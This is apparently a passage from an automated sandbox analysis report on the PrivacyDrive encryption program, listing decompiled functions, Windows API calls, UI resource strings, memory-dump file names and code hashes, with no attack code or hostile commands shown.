                                Function 00488200 Relevance: 30.0, APIs: 6, Strings: 11, Instructions: 210COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004C1DB0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,00000000,00000000,00000000,?,?), ref: 004C1E7F
                                • GetSystemMetrics.USER32(00000000), ref: 004883A5
                                • GetSystemMetrics.USER32(00000000), ref: 004883B1
                                • GetSystemMetrics.USER32(00000000), ref: 004883C4
                                • GetSystemMetrics.USER32(00000000), ref: 004883D0
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • GetSystemMetrics.USER32(00000001), ref: 004883F1
                                • GetSystemMetrics.USER32(00000001), ref: 004883FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MetricsSystem$ByteCharMultiWide
                                • String ID: HEIGHT$MAIN_FRAME$PROGRAM_NAME$Param$Privacy Drive$String$Version.xml$WIDTH$WINDOW_ZOOMED$Window$value
                                • API String ID: 3646970139-3605866157
                                • Opcode ID: a3a6bdb9323faea7ad88a1fe8064f858e8ae5105d9517dcf130841d295931d8b
                                • Instruction ID: b1ebfda65bef082c0e5c1b630037185d9d9caaa7aa874ece3c824be103b71414
                                • Opcode Fuzzy Hash: a3a6bdb9323faea7ad88a1fe8064f858e8ae5105d9517dcf130841d295931d8b
                                • Instruction Fuzzy Hash: 898162719007099FDB10EFA5C952BEFB7F8FB04715F50082EEA55A3280EB79A904CB65
                                Function 004A27F0 Relevance: 29.8, APIs: 3, Strings: 14, Instructions: 88COMMON
                                Download Yara Rule
                                APIs
                                • TryEnterCriticalSection.KERNEL32(005BDCCC,?,004A2335,00403019), ref: 004A27F8
                                • LeaveCriticalSection.KERNEL32(005BDCCC,Dialog,MESSAGE_BOX), ref: 004A281F
                                • LeaveCriticalSection.KERNEL32(005BDCCC,0000000A,BUTTON_YES_TO_ALL,00000009,BUTTON_IGNORE,00000008,BUTTON_RETRY,00000007,BUTTON_NO,00000006,BUTTON_YES,00000005,BUTTON_CANCEL,00000004,BUTTON_OK,00000003), ref: 004A290E
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$Leave$Enter
                                • String ID: BUTTON_CANCEL$BUTTON_IGNORE$BUTTON_NO$BUTTON_OK$BUTTON_RETRY$BUTTON_YES$BUTTON_YES_TO_ALL$Dialog$MESSAGE_BOX$PZ$TITLE_CONFIRM$TITLE_ERROR$TITLE_INFORMATION$TITLE_WARNING
                                • API String ID: 2978645861-3593334972
                                • Opcode ID: 007907fef09b0d729b7f96cd2e50947ceabcaa72322e9c5b12820c5fe66a7175
                                • Instruction ID: c230fded5bb377220e14e7e13e706c1879d40e48003b898d30e2acc354466b5e
                                • Opcode Fuzzy Hash: 007907fef09b0d729b7f96cd2e50947ceabcaa72322e9c5b12820c5fe66a7175
                                • Instruction Fuzzy Hash: 9621763038071162EE5A32261E2BB6B1C46EF59F55F04012EBE15E96C2FFCDD942939E
                                Function 00435AF0 Relevance: 28.4, APIs: 7, Strings: 9, Instructions: 418COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: 8GW$8GW$Item$PrivacyDrive$SerialNumber.cpp$Version2.xml$_1K$sober128$value
                                • API String ID: 4104443479-967538178
                                • Opcode ID: 0ad6c7ad8ee6dfd7d1b99ec4ff2b4d35caadc15167f38a854e782155876cec31
                                • Instruction ID: d95709fe6627dc7ddb49c071ed466c35f91ecf32ed25e48faac051af1bef8829
                                • Opcode Fuzzy Hash: 0ad6c7ad8ee6dfd7d1b99ec4ff2b4d35caadc15167f38a854e782155876cec31
                                • Instruction Fuzzy Hash: 5BE11571E00305ABDB20EB64CC46BEEBB75AF48704F14416EE816B72C1EB759B05CB99
                                Function 0042E890 Relevance: 27.3, APIs: 18, Instructions: 266sleepCOMMON
                                Download Yara Rule
                                APIs
                                • InitializeCriticalSection.KERNEL32(?,7563D392), ref: 0042E8D3
                                • GetWindowRect.USER32(00000000), ref: 0042E915
                                  • Part of subcall function 004CB410: GdipSetSmoothingMode.GDIPLUS(?,00000003,?,lB,0056CE40,?,?,?,?,0042E96C,?,?), ref: 004CB477
                                • __CxxThrowException@8.LIBCMT ref: 0042E972
                                  • Part of subcall function 00502BEB: RaiseException.KERNEL32(?,?,7563D392,005A7F20,?,?,?,?,?,004FFD4E,7563D392,005A7F20,?,00000001), ref: 00502C40
                                • __CxxThrowException@8.LIBCMT ref: 0042E9D1
                                • EnterCriticalSection.KERNEL32(?), ref: 0042EA1D
                                • QueryPerformanceFrequency.KERNEL32(?), ref: 0042EA2D
                                • QueryPerformanceCounter.KERNEL32(?), ref: 0042EA37
                                • LeaveCriticalSection.KERNEL32(?), ref: 0042EA83
                                • EnterCriticalSection.KERNEL32(?), ref: 0042EA9F
                                • QueryPerformanceFrequency.KERNEL32(?), ref: 0042EABA
                                • QueryPerformanceCounter.KERNEL32(?), ref: 0042EAC7
                                • LeaveCriticalSection.KERNEL32(?), ref: 0042EB3E
                                • GdipGraphicsClear.GDIPLUS(?,00000000), ref: 0042EB92
                                • GetDC.USER32(00000000), ref: 0042EC08
                                • UpdateLayeredWindow.USER32(?,00000000,?,?,?,00000000,00000000,00000000,00000002), ref: 0042EC2E
                                • ReleaseDC.USER32(00000000,00000000), ref: 0042EC37
                                • Sleep.KERNEL32(0000000A), ref: 0042EC45
                                • DeleteCriticalSection.KERNEL32(?,?,?), ref: 0042ECC8
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$PerformanceQuery$CounterEnterException@8FrequencyGdipLeaveThrowWindow$ClearDeleteExceptionGraphicsInitializeLayeredModeRaiseRectReleaseSleepSmoothingUpdate
                                • String ID:
                                • API String ID: 2352088596-0
                                • Opcode ID: 2b223375564d7b7d107a87afd578ebf88438bfba17c1097def0c0599e90202ad
                                • Instruction ID: 6fa84a6e90a4798917df95e68be51219107a384099a04e3dbc3a6aa78674998b
                                • Opcode Fuzzy Hash: 2b223375564d7b7d107a87afd578ebf88438bfba17c1097def0c0599e90202ad
                                • Instruction Fuzzy Hash: 1ED13671D0062DDEDB21CFA4CC59B9EBBB8BF19304F10829AE509B7251DB746A85CF60
                                Function 0041D770 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 138serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,7563D392,00000001,?), ref: 0041D7A7
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,0053C2B0,000000FF), ref: 0041D7B4
                                  • Part of subcall function 004A6D40: PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6D8C
                                  • Part of subcall function 004A6D40: DeviceIoControl.KERNEL32(?,07770C80,00000000,00000000,00000000,00004326,7563D392,00000000), ref: 004A6DA6
                                  • Part of subcall function 004A6D40: PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6DCD
                                  • Part of subcall function 004A6D40: PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6DED
                                  • Part of subcall function 004A6D40: EnterCriticalSection.KERNEL32(005BE2CC), ref: 004A6E14
                                  • Part of subcall function 004A6D40: LeaveCriticalSection.KERNEL32(005BE2CC,?), ref: 004A6E27
                                  • Part of subcall function 004A6D40: EnterCriticalSection.KERNEL32(005BE2CC), ref: 004A6E4C
                                  • Part of subcall function 004A6D40: LeaveCriticalSection.KERNEL32(005BE2CC), ref: 004A6E59
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,?,?,?,?,?,00000000,0053C2B0), ref: 0041D7BF
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,0053C2B0,000000FF), ref: 0041D7C6
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,?,?,?,?,?,00000000,0053C2B0), ref: 0041D7D1
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,0053C2B0,000000FF), ref: 0041D7D8
                                • InitializeCriticalSection.KERNEL32(?), ref: 0041D7FA
                                • CloseHandle.KERNEL32(00000000), ref: 0041D87B
                                • CloseHandle.KERNEL32(00000000), ref: 0041D8BD
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CloseCriticalHandleSection$ManagerMessageOpenPeekService$EnterLeave$ControlDeviceInitialize
                                • String ID: 0020$<,X$PDService$PDSvc$PrivacyDrive$pdvstd
                                • API String ID: 1155767753-786742159
                                • Opcode ID: 7f9013be637a4fb1d539a1687d56e943ee8ae04a3c0735e4c55be48d26997d1e
                                • Instruction ID: fe292872d04120c4a511561b547e2c5dc552ceefd20faf9a43f5be35038494dd
                                • Opcode Fuzzy Hash: 7f9013be637a4fb1d539a1687d56e943ee8ae04a3c0735e4c55be48d26997d1e
                                • Instruction Fuzzy Hash: A141C4B0E00308DADB20EBA5CC49BEFBBB8EF55714F04052AE515E72C1DB789945C759
                                Function 00444650 Relevance: 26.3, APIs: 3, Strings: 12, Instructions: 77COMMON
                                Download Yara Rule
                                APIs
                                • TryEnterCriticalSection.KERNEL32(005BDCCC), ref: 00444658
                                • LeaveCriticalSection.KERNEL32(005BDCCC,Dialog,CREATING_VOLUME), ref: 0044467F
                                • LeaveCriticalSection.KERNEL32(005BDCCC,00000008,CHECKBOX_AUTO_CLOSE,00000007,BUTTON_OK,00000006,BUTTON_STOP,00000005,STRING_SEC,00000004,LABEL_REMAINING_TIME,00000003,LABEL_ELAPSED_TIME,00000002,LABEL_COMPLETED,00000001), ref: 00444742
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$Leave$Enter
                                • String ID: BUTTON_OK$BUTTON_STOP$CHECKBOX_AUTO_CLOSE$CREATING_VOLUME$Dialog$LABEL_COMPLETED$LABEL_DAY$LABEL_ELAPSED_TIME$LABEL_REMAINING_TIME$LABEL_SPEED$PZ$STRING_SEC
                                • API String ID: 2978645861-3884833104
                                • Opcode ID: 1354aac24ce8b8ef273c1a10e92ac794f3d38bbd9ea45b925beea1b5509dcd24
                                • Instruction ID: 055efe20bf076642a387449986969e2f221064955289446957f10a815dd99779
                                • Opcode Fuzzy Hash: 1354aac24ce8b8ef273c1a10e92ac794f3d38bbd9ea45b925beea1b5509dcd24
                                • Instruction Fuzzy Hash: FA114C22381F2122FA5522322D1BB2F094A6B81F69F16405ABE05AD2C2FECDCD41D29C
                                Function 0041B250 Relevance: 25.6, APIs: 6, Strings: 11, Instructions: 121COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 0041B260
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0041B278
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Button,?,DIALOG_EXPAND), ref: 0041B2A5
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0041B2B7
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Button,?,DIALOG_EXPAND), ref: 0041B2E4
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0041B2F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: Button$DIALOG_EXPAND$IMG_ARROW_HIT_DOWN$IMG_ARROW_HIT_UP$IMG_ARROW_NORMAL_DOWN$IMG_ARROW_NORMAL_UP$IMG_BUTTON_HIT$IMG_BUTTON_NORMAL$IMG_BUTTON_PUSH$PM_BORDER$PM_HEIGHT
                                • API String ID: 904232820-730490805
                                • Opcode ID: 0a707aea084ef99030b8f85b3a938d66ff42589019587328b4cc63533453426a
                                • Instruction ID: 11b5f008a0bab000d85bfe6aabd39e875f0e977299389ebaf7c90ea5c12af504
                                • Opcode Fuzzy Hash: 0a707aea084ef99030b8f85b3a938d66ff42589019587328b4cc63533453426a
                                • Instruction Fuzzy Hash: DF317E7038070667E614A7328C53FEB6A94FF50B45F05042FBA56E62D1FFD8E850C6A9
                                Function 0043B0A0 Relevance: 25.6, APIs: 6, Strings: 11, Instructions: 116COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 0043B0B0
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0043B0C8
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Button,?,FRAME_BUTTON), ref: 0043B0F5
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0043B107
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Button,?,FRAME_BUTTON), ref: 0043B134
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0043B146
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: Button$FRAME_BUTTON$IMG_CLOSE_ICON$IMG_CLOSE_ICON_B$IMG_HIDE_ICON$IMG_MAXIMIZE_ICON$IMG_MAXIMIZE_ICON_2$IMG_MAXIMIZE_ICON_2B$IMG_MAXIMIZE_ICON_B$IMG_MINIMIZE_ICON$IMG_MINIMIZE_ICON_B
                                • API String ID: 904232820-3307000364
                                • Opcode ID: 83c5b8bb67f0ae4b3de67eb1b1a33e3331752b4c9c3ddd21483f26a95269ca02
                                • Instruction ID: ae8332686b30e96149a427469382f687029e1379bd36c23878b8f88bf8a8bd2f
                                • Opcode Fuzzy Hash: 83c5b8bb67f0ae4b3de67eb1b1a33e3331752b4c9c3ddd21483f26a95269ca02
                                • Instruction Fuzzy Hash: 85319670384B0167E6506232AC06F7F6AA4BF54B46F04451FB789DA2C1FFD8EC00D6A9
                                Function 00467800 Relevance: 25.6, APIs: 6, Strings: 11, Instructions: 116COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,0046799E,?,?,?,?,?,00416FD7,?,?,00004E24,?,?), ref: 00467810
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,?,00416FD7,?,?,00004E24,?,?,00000001,00000001,00000000,?,00004E23), ref: 00467828
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,CheckBox,?,STANDARD,?,?,?,?,00416FD7,?,?,00004E24,?,?,00000001), ref: 00467855
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,?,00416FD7,?,?,00004E24,?,?,00000001,00000001,00000000,?,00004E23), ref: 00467867
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,CheckBox,?,STANDARD,?,?,?,?,00416FD7,?,?,00004E24,?,?,00000001), ref: 00467894
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,?,00416FD7,?,?,00004E24,?,?,00000001,00000001,00000000,?,00004E23), ref: 004678A6
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: CheckBox$IMG_FALSE_DISABLED$IMG_FALSE_HIT$IMG_FALSE_NORMAL$IMG_MIX_DISABLED$IMG_MIX_HIT$IMG_MIX_NORMAL$IMG_TRUE_DISABLED$IMG_TRUE_HIT$IMG_TRUE_NORMAL$STANDARD
                                • API String ID: 904232820-3637807266
                                • Opcode ID: 8fb17536e8b4ead56b5290bd40afe8e34491561d750b738c4d215767a7589741
                                • Instruction ID: f7ad346479b9b53a794ad72869dacbe2bb623c799672af52881e4c440d7ad630
                                • Opcode Fuzzy Hash: 8fb17536e8b4ead56b5290bd40afe8e34491561d750b738c4d215767a7589741
                                • Instruction Fuzzy Hash: C63152703C470167EB1066725C02FAB6AD87F51B49F08452FBA49D62C1FEDCEC049A69
                                Function 00402A90 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 494COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Exception@8Throwstd::exception::exception
                                • String ID: !@$%c:$0004$0016$0019$0023$0044$0045$0052$0053$invalid string position
                                • API String ID: 3728558374-380519356
                                • Opcode ID: fb1a3b4c621964309793fbac6483950868ff512b5d9397d9f71006edde34317c
                                • Instruction ID: b53a1559ec5fce48767fb9fb50009b447b2e265dac9f65a9b331509fc4851b15
                                • Opcode Fuzzy Hash: fb1a3b4c621964309793fbac6483950868ff512b5d9397d9f71006edde34317c
                                • Instruction Fuzzy Hash: 84129170A00209EEEF10DF95CD4ABEEBBB9BF18319F10412AF515B61D0E7B46A44CB65
                                Function 00420970 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 177stringCOMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 004209DF
                                • GetOpenFileNameW.COMDLG32(?,?,?,00000000,?,?,?,?,Window\ToolBar\Class,MAIN_FRAME|HOME|MOUNT,?,?,?,00412591), ref: 00420A61
                                • lstrcpynW.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,Window\ToolBar\Class,MAIN_FRAME|HOME|MOUNT,?,?,?,00412591), ref: 00420A8F
